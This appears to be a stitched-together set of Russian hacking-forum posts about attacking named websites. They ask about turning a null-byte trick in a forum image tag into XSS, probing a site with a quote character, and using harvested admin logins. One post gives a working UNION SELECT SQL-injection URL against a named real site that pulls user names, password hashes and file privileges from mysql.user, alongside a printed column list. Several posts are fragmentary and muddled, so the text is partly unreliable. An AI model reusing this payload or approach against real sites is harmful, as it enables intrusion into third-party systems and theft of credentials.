нашол на одном форуме ипб в тег если прописать [ img]http://site.com/folder/script%00.jpg[ /img] то адрес картинки получается в подписи http://site.com/folder/script можно из этого сделать активную xss?
Как никак! Если запрос http://dom2.ru/heroes/1697' проходит и переменая $hero.name не проверяется вот и по этому она выводится! так как она пустая функция echo выводит её не как переменю а как текст! Пример echo ("$hero.name"); из этого следует что запрос к базе прошел!!! Я не прав?
Вообщем, дело такое. тут я, вроде бы, что-то как-то разобрался: правда, куда этот логин/пасс втыкать не въехал (http://www.gps-ru.ru/admin не катит) есть еще вот такое срамотный сайт: вот во 2-м случае я не понял: кто такой andy? и как бы мне найти логин/пароль как из 1-го случая....
Тебе флудом мозги съело? Он вручную будет подбирать дефолтную структуру таблицы мускуля? Омфг. Code: mysql> select column_name from information_schema.columns where table_name='mysql.user'; +-----------------------+ | column_name | +-----------------------+ | Host | | User | | Password | | Select_priv | | Insert_priv | | Update_priv | | Delete_priv | | Create_priv | | Drop_priv | | Reload_priv | | Shutdown_priv | | Process_priv | | File_priv | | Grant_priv | | References_priv | | Index_priv | | Alter_priv | | Show_db_priv | | Super_priv | | Create_tmp_table_priv | | Lock_tables_priv | | Execute_priv | | Repl_slave_priv | | Repl_client_priv | | Create_view_priv | | Show_view_priv | | Create_routine_priv | | Alter_routine_priv | | Create_user_priv | | ssl_type | | ssl_cipher | | x509_issuer | | x509_subject | | max_questions | | max_updates | | max_connections | | max_user_connections | +-----------------------+ 37 rows in set
а ты уверен что off-docnescott - это админ? поробу вот так: http://www.glaad.org/action/calls_archive_detail.php?id=-4805+union+select+1,2,3,4,5,concat_ws(0x3a,user,password,host,file_priv) ,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql .user+where+host='%'/*
$hero.name - это не переменная, присваивающая входящие данные, а скорее всего обозначение для шаблонизатора, куда он должен вставлять соответствующие данные из базы данных или файлов. Уязвимости в данном случае нет.